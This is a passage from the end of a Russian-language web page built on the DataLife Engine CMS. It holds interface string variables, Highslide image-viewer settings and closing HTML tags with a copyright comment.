var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

jQuery(function($){

hs.graphicsDir = '/engine/classes/highslide/graphics/';
hs.wrapperClassName = 'rounded-white';
hs.outlineType = 'rounded-white';
hs.numberOfImagesToPreload = 0;
hs.captionEval = 'this.thumb.alt';
hs.showCredits = false;
hs.align = 'center';
hs.transitions = ['expand', 'crossfade'];

hs.lang = { loadingText : 'Загрузка...', playTitle : 'Просмотр слайдшоу (пробел)', pauseTitle:'Пауза', previousTitle : 'Предыдущее изображение', nextTitle :'Следующее изображение',moveTitle :'Переместить', closeTitle :'Закрыть (Esc)',fullExpandTitle:'Развернуть до полного размера',restoreTitle:'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',focusTitle:'Сфокусировать',loadingTitle:'Нажмите для отмены'
};
hs.slideshowGroup='fullnews'; hs.addSlideshow({slideshowGroup: 'fullnews', interval: 4000, repeat: false, useControls: true, fixedControls: 'fit', overlayOptions: { opacity: .75, position: 'bottom center', hideOnMouseOut: true } });

});
//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
